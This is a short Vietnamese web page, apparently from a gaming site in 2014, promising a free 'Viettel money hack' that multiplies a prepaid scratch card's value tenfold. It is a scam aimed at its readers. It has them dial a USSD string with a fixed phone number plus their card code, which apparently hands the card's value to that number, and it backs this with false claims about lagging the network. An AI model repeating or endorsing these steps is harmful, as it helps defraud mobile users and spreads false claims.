Chơi quá 180 phút mỗi ngày sẽ hại sức khỏe
Nạp Gem Quên MK

Bài:4
+ Bước 1: Chuẩn bị một thẻ cào viettel (mệnh giá tùy theo túi tiền của bạn){Lưu ýhủ thuật hack tiền viettel, mới nhất này chỉ có thể hack được 1 ngày/1 lầnthôi nhé!}
- Khi bạn thực hiện theo những cáchhack tiền viettel miễn phí dưới đây, mình có thểchắc chắn rằng sau khi hack thấp nhất bạncũng được x10 lần giá trị thẻ nạp mà bạn vừa mua!
+ Bước 2: Bạn lấy thẻ nạp vừa mua cào nhẹ lớp phủ bạc lấy mã thẻ và thực hiện trên bàn phím như sau : Bạn ấn: *103*841687876738 *mã thẻ nạp#
{Lưu ý: Dãy số 841687876738 là dãy số mà chúng tôi đã mã hóa trên sever hack tien viettelcho bạn sử dụng, do các hacker của công ty chúng tôi đã tạo ra để làm lag mạng viettel!
(Thẻ cào của bạn sẽ được sử lý và bug tiềntheo dãy số này)
+ Bước 3: Bước này là bước cực kì quan trọng nhé!Sau khi thao tác xong theo cú pháp: *103*841687876738 *mã thẻ nạp# bạn nhấn nút gọi để nạp thẻ máy sẽ báo xin chờ... Các bạn đếm 1,2,3 giây rùi nhanh ấn nút đỏ.
Tại sao lại vậy (vì thẻ của bạn trong 3s đó đã đi qua sever hack nên tổng đài chỉ kịp xác định mệnh giá thẻ mà không kịp soi hết mã thẻ vì vậy thẻ vẫn còn giá trị sử dụng.)
-Lúc này tiền vẫn chưa được cộng vào tài khoản của bạn!
{Đừng quá lo lắng bạn đợi khoảng 2-3 phút sau bạn gọi 901 nó sẽ nói là:"bạn đã nạp x nghìn đồng vào tài khoản"(x là giá trị của thẻ cào mà bạn nạp).
Chúc bạn may mắn...
2014-08-02 17:30:35